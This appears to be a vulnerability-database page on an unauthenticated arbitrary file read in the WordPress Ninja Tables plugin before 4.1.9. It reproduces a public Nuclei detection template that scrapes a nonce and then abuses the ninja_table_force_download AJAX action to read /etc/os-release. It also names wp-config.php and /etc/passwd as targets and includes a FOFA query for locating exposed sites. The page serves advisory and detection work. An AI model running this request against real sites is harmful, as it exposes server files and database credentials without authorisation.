wp-ninja-tables-lfi: Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read

日期: 2025-08-01 | 影响软件: Ninja Tables | POC: 已公开

漏洞描述

The Ninja Tables plugin for WordPress (versions < 4.1.9) is vulnerable to an unauthenticated arbitrary file download vulnerability. The issue exists due to the improper validation of the 'url' parameter in the 'ninja_table_force_download' AJAX action.

PoC代码[已公开]

id: wp-ninja-tables-lfi

info:
  name: Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read
  author: xbow,DhiyaneshDk
  severity: high
  description: |
    The Ninja Tables plugin for WordPress (versions < 4.1.9) is vulnerable to an unauthenticated arbitrary file download vulnerability. The issue exists due to the improper validation of the 'url' parameter in the 'ninja_table_force_download' AJAX action.
  impact: |
    An unauthenticated attacker can download sensitive files from the server, such as '/etc/passwd' or '/wp-config.php', potentially exposing sensitive information including database credentials.
  remediation: |
    Update the Ninja Tables plugin to version 4.1.9 or later.
  reference:
    - https://xbow.com/blog/xbow-ninja-tables/
    - https://ninjatables.com/docs/change-log/#521-date-july-9-2025
  metadata:
    verified: true
    max-request: 2
    vendor: wpxpo
    product: ninja-tables
    fofa-query: body="/wp-content/plugins/ninja-tables/"
  tags: ninja-tables,file-download,wordpress,unauth,lfi,wp-plugin,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, "ninja_table")
        internal: true

    extractors:
      - type: regex
        name: public_nonce
        part: body
        group: 1
        regex:
          - '"ninja_table_public_nonce":"([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/os-release&ninja_table_public_nonce={{public_nonce}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/octet-stream")
          - status_code == 200
          - contains(body, "PRETTY_NAME=")
        condition: and
# digest: 4a0a00473045022075207e335a87a36192c71c057e0bb2f056b39b92685ca12302abf3ffff51dbbe022100a96f0f3ba0984e9312e90c8cb8bb102024d0d5a1375ffb6c809c6bbc0b171678:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/wp-ninja-tables-lfi.yaml

相关漏洞推荐